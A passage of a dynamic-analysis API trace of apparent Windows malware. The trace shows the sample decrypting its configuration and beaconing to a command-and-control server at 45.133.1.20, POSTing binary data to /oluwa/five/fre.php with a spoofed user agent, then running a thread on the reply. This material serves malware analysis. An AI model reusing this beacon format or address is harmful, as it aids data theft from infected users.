dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.421] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0235.432] GetProcessHeap () returned 0x6a0000 [0235.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0235.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.436] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0235.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.437] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.439] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.439] GetProcessHeap () returned 0x6a0000 [0235.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0235.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.441] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0235.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.442] CryptDestroyKey (hKey=0x6ad020) returned 1 [0235.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.443] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0235.443] GetProcessHeap () returned 0x6a0000 [0235.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.451] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.453] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.454] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.454] GetProcessHeap () returned 0x6a0000 [0235.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0235.454] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.454] GetProcessHeap () returned 0x6a0000 [0235.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0235.455] GetProcessHeap () returned 0x6a0000 [0235.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.458] GetProcessHeap () returned 0x6a0000 [0235.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0235.458] GetProcessHeap () returned 0x6a0000 [0235.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0235.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.480] GetProcessHeap () returned 0x6a0000 [0235.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.482] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.483] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.484] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.484] GetProcessHeap () returned 0x6a0000 [0235.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.486] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0235.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.488] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.489] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.489] GetProcessHeap () returned 0x6a0000 [0235.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.490] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0235.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.491] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0235.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.492] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0235.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0235.494] GetProcessHeap () returned 0x6a0000 [0235.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.494] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0235.494] GetProcessHeap () returned 0x6a0000 [0235.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0235.494] socket (af=2, type=1, protocol=6) returned 0x754 [0235.495] connect (s=0x754, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0235.518] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0235.518] GetProcessHeap () returned 0x6a0000 [0235.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0235.518] GetProcessHeap () returned 0x6a0000 [0235.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0235.519] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.520] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0235.520] GetProcessHeap () returned 0x6a0000 [0235.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0235.521] GetProcessHeap () returned 0x6a0000 [0235.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.521] GetProcessHeap () returned 0x6a0000 [0235.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0235.521] GetProcessHeap () returned 0x6a0000 [0235.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0235.522] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.523] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0235.523] GetProcessHeap () returned 0x6a0000 [0235.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0235.523] GetProcessHeap () returned 0x6a0000 [0235.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.524] send (s=0x754, buf=0x6bd460*, len=242, flags=0) returned 242 [0235.525] send (s=0x754, buf=0x6bb998*, len=159, flags=0) returned 159 [0235.525] GetProcessHeap () returned 0x6a0000 [0235.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0235.525] recv (in: s=0x754, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0235.593] GetProcessHeap () returned 0x6a0000 [0235.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0235.594] GetProcessHeap () returned 0x6a0000 [0235.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0235.595] GetProcessHeap () returned 0x6a0000 [0235.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0235.596] GetProcessHeap () returned 0x6a0000 [0235.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0235.596] closesocket (s=0x754) returned 0 [0235.597] GetProcessHeap () returned 0x6a0000 [0235.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0235.597] GetProcessHeap () returned 0x6a0000 [0235.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.597] GetProcessHeap () returned 0x6a0000 [0235.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0235.598] GetProcessHeap () returned 0x6a0000 [0235.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0235.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1488) returned 0x754 [0235.602] Sleep (dwMilliseconds=0xea60) [0235.603] GetProcessHeap () returned 0x6a0000 [0235.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0235.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.618] GetProcessHeap () returned 0x6a0000 [0235.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.619] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.623] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.624] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.624] GetProcessHeap () returned 0x6a0000 [0235.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.626] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0235.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.627] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0235.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.628] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.628] GetProcessHeap () returned 0x6a0000 [0235.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.629] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.639] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.639] GetProcessHeap () returned 0x6a0000 [0235.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0235.639] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.639] GetProcessHeap () returned 0x6a0000 [0235.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0235.640] GetProcessHeap () returned 0x6a0000 [0235.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.641] GetProcessHeap () returned 0x6a0000 [0235.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0235.642] GetProcessHeap () returned 0x6a0000 [0235.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0235.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0235.658] GetProcessHeap () returned 0x6a0000 [0235.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0235.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.659] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0235.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.660] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.661] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.661] GetProcessHeap () returned 0x6a0000 [0235.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0235.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.663] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0235.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.664] CryptDestroyKey (hKey=0x6ad020) returned 1 [0235.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.665] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0235.665] GetProcessHeap () returned 0x6a0000 [0235.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0235.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.666] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0235.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.667] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0235.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.668] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0235.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.669] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0235.669] GetProcessHeap () returned 0x6a0000 [0235.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0235.669] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0235.670] GetProcessHeap () returned 0x6a0000 [0235.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0235.670] socket (af=2, type=1, protocol=6) returned 0x758 [0235.670] connect (s=0x758, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0235.778] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0235.794] GetProcessHeap () returned 0x6a0000 [0235.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0235.800] GetProcessHeap () returned 0x6a0000 [0235.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0235.801] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.802] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0235.802] GetProcessHeap () returned 0x6a0000 [0235.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0235.802] GetProcessHeap () returned 0x6a0000 [0235.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.803] GetProcessHeap () returned 0x6a0000 [0235.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0235.803] GetProcessHeap () returned 0x6a0000 [0235.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0235.804] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0235.806] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0235.806] GetProcessHeap () returned 0x6a0000 [0235.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0235.806] GetProcessHeap () returned 0x6a0000 [0235.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0235.807] send (s=0x758, buf=0x6bd460*, len=242, flags=0) returned 242 [0235.808] send (s=0x758, buf=0x6bb998*, len=159, flags=0) returned 159 [0235.808] GetProcessHeap () returned 0x6a0000 [0235.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0235.808] recv (in: s=0x758, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0235.875] GetProcessHeap () returned 0x6a0000 [0235.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0235.876] GetProcessHeap () returned 0x6a0000 [0235.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0235.876] GetProcessHeap () returned 0x6a0000 [0235.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0235.878] GetProcessHeap () returned 0x6a0000 [0235.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0235.879] closesocket (s=0x758) returned 0 [0235.879] GetProcessHeap () returned 0x6a0000 [0235.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0235.880] GetProcessHeap () returned 0x6a0000 [0235.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0235.880] GetProcessHeap () returned 0x6a0000 [0235.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0235.880] GetProcessHeap () returned 0x6a0000 [0235.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0235.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x148c) returned 0x758 [0235.899] Sleep (dwMilliseconds=0xea60) [0235.901] GetProcessHeap () returned 0x6a0000 [0235.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0235.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0235.919] GetProcessHeap () returned 0x6a0000 [0235.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da038 [0235.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.921] CryptImportKey (in: hProv=0x6bf168, pbData=0x6da038, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0235.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0235.927] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.928] 